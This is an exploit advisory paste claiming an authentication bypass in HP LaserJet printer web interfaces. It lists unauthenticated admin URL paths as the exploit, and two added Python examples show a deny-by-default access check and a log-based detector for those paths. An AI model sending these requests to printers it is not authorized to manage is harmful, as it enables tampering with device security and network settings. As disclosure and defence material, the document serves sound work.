KingSkrupellos

HP Color LaserJet Multiple Printers 6.7.0.x Auth Bypass

May 22nd, 2019
############################################################################################

# Exploit Title : HP Color LaserJet Multiple Printers 6.7.0.x Authentication Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 23/05/2019
# Vendor Homepage : hp.com
# Software Information Link : support.hp.com/gb-en/drivers/
# Software Affected Versions :
Driver-Universal Print Driver for Managed Services => 6.7.0.x
Example Printer Model Numbers : CCXXXA
Driver-Product Installation Software => 61.091.12.102 and other versions
Driver-Universal Print Driver => Version 6.1.0.20062 and 6.7.0.23989 and other versions
Driver-USB => 7.0.0.29 and other versions
Firmware => 07.250.2 and other versions
Software Universal Printer Driver => Version 1.8.6 and other versions
Utility => Version 1.0 and other versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
CWE-592 [ Authentication Bypass Issues ]
CWE-306 [ Missing Authentication for Critical Function ]
CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Reference Links from PacketStormSecurity :
*****************************************
HP LaserJet P4014/P4015 Printers 6.7.0.x Bypass Missing Authentication
dl.packetstormsecurity.net/1904-exploits/hplj401467x-bypass.txt

HP LaserJet P3015 Printers 6.7.0.x Bypass Missing Authentication
dl.packetstormsecurity.net/1904-exploits/hplj3015670x-bypass.txt

HP LaserJet 5200 Printers 6.7.0.x Bypass Missing Authentication
dl.packetstormsecurity.net/1904-exploits/hplj5200670x-bypass.txt

HP Color LaserJet CP4025 Printers 6.7.0.x Bypass Missing Authentication
dl.packetstormsecurity.net/1904-exploits/hplj670x-bypass.txt

HP Color LaserJet CP4525 Printers 6.7.0.x Bypass Missing Authentication
dl.packetstormsecurity.net/1904-exploits/hplj4525670x-bypass.txt

############################################################################################

# Description about Software :
***************************
HP LaserJet as a brand name identifies the line of dry electrophotographic (DEP) laser printers
marketed by the American computer company Hewlett-Packard (HP).
The HP LaserJet was the world's first desktop laser printer.

############################################################################################

# Impact :
***********
The software does not perform any authentication for functionality that requires a provable user identity
or consumes a significant amount of resources.
The vulnerability allows a remote unauthenticated attacker to send a specially crafted HTTP request to the
affected application and change configuration settings or gain administrative access.
Missing authentication for a critical function is a language-independent issue that can appear
in any multiuser environment.
Developing a fix requires an understanding of the current application security model
and the implemented access controls.
Three basic rules, however, can help you eliminate potential improper authorization issues:
1) Identify all privileged assets within your application (web pages that display sensitive data,
website sections that contain privileged/administrative functionality, etc.)
2) Identify user roles within the application and their access permissions
3) Always check if the user should have privileges to access the asset

When an actor claims to have a given identity, the software does not prove
or insufficiently proves that the claim is correct.

############################################################################################
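
The three rules above written as a deny-by-default check. This is an added example, not part of the original paste and not HP's firmware code. The role names and the role assigned to each page are assumptions; the paths are the ones this advisory lists.

```python
from urllib.parse import urlsplit, parse_qs

# Rule 1: inventory of privileged assets. The dispatcher serves many pages from
# one path, so the asset key is (path, nav value), not the path alone.
DISPATCHER = "/hp/device/this.LCDispatcher"
PRIVILEGED = {
    (DISPATCHER, "hp.Security"): "admin",      # role assignments are assumptions
    (DISPATCHER, "hp.EmailServer"): "admin",
    (DISPATCHER, "hp.Config"): "admin",
    ("/tcp_param.htm", None): "admin",
    ("/index_info.htm", None): "viewer",
}

# Rule 2: roles and the access levels each one satisfies (hypothetical roles).
ROLE_GRANTS = {"admin": {"admin", "viewer"}, "viewer": {"viewer"}}


def required_role(url):
    """Return the role an asset needs; anything not inventoried needs 'admin'."""
    parts = urlsplit(url)
    nav_values = parse_qs(parts.query).get("nav", [])
    if len(nav_values) > 1:
        # Duplicate nav= parameters are ambiguous: treat the request as privileged.
        return "admin"
    nav = nav_values[0] if nav_values else None
    return PRIVILEGED.get((parts.path, nav), "admin")


def is_allowed(url, session_role):
    """Rule 3: run on every request; a request without a session is refused."""
    if session_role is None:
        return False
    return required_role(url) in ROLE_GRANTS.get(session_role, set())


if __name__ == "__main__":
    url = DISPATCHER + "?nav=hp.Security&fldPage=0"
    for role in (None, "viewer", "admin"):
        print(role, is_allowed(url, role))
```

Keying the inventory on the `nav` value matters here because every dispatcher page shares one path, so a check on the path alone cannot tell a status page from the security settings.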

# Authentication Bypass Exploit :
******************************
/hp/device/this.LCDispatcher
/hp/device/this.LCDispatcher?nav=hp.EmailServer
/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
/hp/device/this.LCDispatcher?nav=hp.Alerts
/hp/device/this.LCDispatcher?nav=hp.AutoSend
/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
/hp/device/this.LCDispatcher?nav=hp.OtherLinks
/hp/device/this.LCDispatcher?nav=hp.Config
/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig

/hp/jetdirect

/config_pro.htm
/tcpipv6.htm
/tcpipv4.htm

/tcp_param.htm
/network_id.htm

/tcp_summary.htm
/index_info.htm

/support_param.html
/support.htm

/tcp_diag.htm
/configpage.htm

############################################################################################
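
A detection sketch for the paths listed above: it reads HTTP request records and reports successful requests to these pages from sources outside the management subnet. This is an added example, not part of the original paste. The log format, the sample lines, and the `10.0.50.0/24` management subnet are constructed assumptions.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Paths taken from the list in this advisory.
EWS_PATHS = {"/hp/jetdirect", "/config_pro.htm", "/tcpipv6.htm", "/tcpipv4.htm",
             "/tcp_param.htm", "/network_id.htm", "/tcp_summary.htm", "/index_info.htm",
             "/support_param.html", "/support.htm", "/tcp_diag.htm", "/configpage.htm"}
DISPATCHER = "/hp/device/this.LCDispatcher"

# Assumption: hosts allowed to manage printers live in this subnet.
ADMIN_NET = ipaddress.ip_network("10.0.50.0/24")

# Constructed sample records: time, source IP, printer IP, method, URI, status.
SAMPLE_LOG = """\
2019-05-23T09:01:02Z 10.0.50.7 10.0.9.21 GET /hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0 200
2019-05-23T09:04:40Z 10.0.12.88 10.0.9.21 GET /hp/device/this.LCDispatcher?nav=hp.EmailServer 200
2019-05-23T09:04:41Z 10.0.12.88 10.0.9.21 GET /tcp_param.htm 200
2019-05-23T09:05:10Z 10.0.12.88 10.0.9.21 GET /images/logo.gif 200
2019-05-23T09:06:00Z 10.0.12.90 10.0.9.22 GET /config_pro.htm 401
not a log line
"""


def find_unexpected_access(log_text, admin_net=ADMIN_NET):
    """Return (source, printer, path, nav) for 200 responses to non-admin sources."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip malformed records
        _ts, src, dst, _method, uri, status = fields
        try:
            outside = ipaddress.ip_address(src) not in admin_net
        except ValueError:
            continue  # source field is not an IP address
        parts = urlsplit(uri)
        sensitive = parts.path in EWS_PATHS or parts.path == DISPATCHER
        if sensitive and outside and status == "200":
            nav = parse_qs(parts.query).get("nav", [""])[0]
            hits.append((src, dst, parts.path, nav))
    return hits


if __name__ == "__main__":
    for hit in find_unexpected_access(SAMPLE_LOG):
        print(hit)
```

A `401` response is not reported because it shows the page asked for credentials; a `200` to a source outside the management subnet is the case that needs review.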

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################